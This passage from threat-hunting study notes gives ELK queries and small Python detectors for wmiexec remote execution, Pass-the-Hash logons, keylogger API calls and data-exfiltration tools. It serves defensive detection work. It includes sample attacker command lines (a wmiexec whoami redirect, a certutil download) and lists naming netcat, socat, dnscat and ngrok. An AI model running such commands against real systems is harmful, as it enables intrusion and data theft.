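    r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1668382344 2>&1"))  # True
print(is_wmiexec_cmdline("cmd.exe /c dir"))  # False
```

The loopback address and ADMIN$ output file are defaults of wmiexec.py, so operators who customise them will evade this exact regex; the WmiPrvSE.exe parent-process hunt above remains the broader net.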
You can then investigate further and locate the initial IP of
the compromised host used to execute these commands by
highlighting the event, clicking on view surrounding
documents , and filtering for event ID 4624 , which
should list all events leading up to the one above.
When the dumped credentials do not include a plaintext
password, threat actors can instead authenticate with the
account's hash, a technique called Pass-the-Hash (PtH).
PtH is a technique threat actors use to authenticate and
gain unauthorised access to systems without knowing the
user's password. It exploits how authentication
protocols, such as NTLM, store and use password hashes
instead of plaintext passwords.
There are ways to detect the usage of PtH while
authenticating remotely. The list below details the
indicators of PtH on network authentication:
     Event ID: 4624
     Logon Type: 3 (Network)
     LogonProcessName: NtLmSsp
     KeyLength: 0
Based on the above, we can use the below query:
 winlog.event_id: 4624 AND
 winlog.event_data.LogonType: 3 AND
 winlog.event_data.LogonProcessName: *NtLmSsp*
 AND winlog.event_data.KeyLength: 0
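As a hedged sketch, the four indicators can be bundled into one predicate over an exported 4624 record. Field values are kept as strings, matching how winlogbeat typically ships them; the sample event is invented.

```python
# Sketch: the PtH network-logon indicators as a predicate over a 4624 event.

def is_pth_logon(event):
    """Return True if the logon event matches the Pass-the-Hash indicators."""
    return (event.get("winlog.event_id") == 4624
            and event.get("winlog.event_data.LogonType") == "3"
            and "NtLmSsp" in event.get("winlog.event_data.LogonProcessName", "")
            and event.get("winlog.event_data.KeyLength") == "0")

sample = {"winlog.event_id": 4624,
          "winlog.event_data.LogonType": "3",
          "winlog.event_data.LogonProcessName": "NtLmSsp ",
          "winlog.event_data.KeyLength": "0"}
print(is_pth_logon(sample))  # True
```

NTLM network logons also occur legitimately, so hits from this predicate are leads to correlate with unusual source hosts or accounts, not convictions on their own.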
Hunting Keylogger Activity
The most common forms of keyloggers are implemented with
direct API calls, registry modifications, malicious
driver files, customised scripts and function calls, and packed
executables.
Common API and function calls used by keyloggers are
listed below:
 -   GetKeyboardState
 -   SetWindowsHook
 -   GetKeyState
 -   GetAsyncKeyState
 -   VirtualKey
 -   vKey
 -   filesCreated
 -   DrawText
Common low-level hooks used by keyloggers are listed
below:
 -   SetWindowsHookEx
 -   WH_KEYBOARD
 -   WH_KEYBOARD_LL
 -   WH_MOUSE_LL
 -   WH_GETMESSAGE
Setting the right index in ELK, we can use the below query
to match the above patterns:
 *GetKeyboardState* or *SetWindowsHook* or
 *GetKeyState* or *GetAsyncKeyState* or
 *VirtualKey* or *vKey* or *filesCreated* or
 *DrawText*
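A small helper can rebuild that wildcard query from the indicator list, so the list stays the single source of truth when new API names are added. This is a sketch; the names are the ones listed in this section (with GetAsyncKeyState spelled as the Win32 API names it).

```python
# Sketch: generate the wildcard query from the keylogger API indicator list.
API_CALLS = ["GetKeyboardState", "SetWindowsHook", "GetKeyState",
             "GetAsyncKeyState", "VirtualKey", "vKey", "filesCreated",
             "DrawText"]

# Wrap each name in wildcards and join with "or", matching the query syntax above.
query = " or ".join(f"*{name}*" for name in API_CALLS)
print(query)
```

Appending a new hook name to API_CALLS, for example "WH_KEYBOARD_LL", automatically extends the generated query.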
Hunting Data Exfiltration
Data exfiltration attempts can be detected by focusing on
the system tools and processes commonly used for the
transfer, rather than by investigating network traffic.
Common command executions and file access activities
associated with data exfiltration are listed below:
 - ping, ipconfig, arp, route, telnet
 - tracert, nslookup, netstat, netsh
 - localhost, host, smb, smtp, scp, ssh
 - wget, curl, certutil, net use
 - nc, ncat, netcut, socat, dnscat, ngrok
 - psfile, psping
 - tcpvcon, tftp, socks
 - Invoke-WebRequest, server, http, post, ssl,
 encod, chunk
We can look for system tool invocations that lead to data
transfer with the below query:
 *$ping* or *$ipconfig* or *$arp* or *$route*
 or *$telnet* or *$tracert* or *$nslookup* or
 *$netstat* or *$netsh* or *$smb* or *$smtp* or
 *$scp* or *$ssh* or *$wget* or *$curl* or
 *$certutil* or *$nc* or *$ncat* or *$netcut*
 or *$socat* or *$dnscat* or *$ngrok* or
 *$psfile* or *$psping* or *$tcpvcon* or
 *$tftp* or *$socks* or *$Invoke-WebRequest* or
 *$server* or *$post* or *$ssl* or *$encod* or
 *$chunk*
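Bare wildcard matching is noisy, since substrings like nc appear inside many benign words. A hedged alternative sketch is whole-word matching of the tool names from the list above against a command line:

```python
import re

# Sketch: whole-word matching of exfiltration tool indicators against a
# command line, which reduces false positives compared to bare wildcards.
EXFIL_TOOLS = {"ping", "ipconfig", "arp", "route", "telnet", "tracert",
               "nslookup", "netstat", "netsh", "scp", "ssh", "wget", "curl",
               "certutil", "nc", "ncat", "netcut", "socat", "dnscat",
               "ngrok", "psfile", "psping", "tcpvcon", "tftp"}

def exfil_indicators(cmdline):
    """Return the sorted list of exfiltration tool names present as whole tokens."""
    tokens = set(re.findall(r"[A-Za-z][\w.-]*", cmdline.lower()))
    return sorted(tokens & EXFIL_TOOLS)

print(exfil_indicators("certutil -urlcache -split -f http://host/x.bin x.bin"))  # ['certutil']
```

Generic terms from the list above (localhost, server, http, ssl, and so on) are deliberately left out of the token set here, since as whole words they match far too much benign activity.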
Done!
Check out other cheat sheets and study notes using the
below link
 https://shop.motasem-notes.net
 https://buymeacoffee.com/notescatalog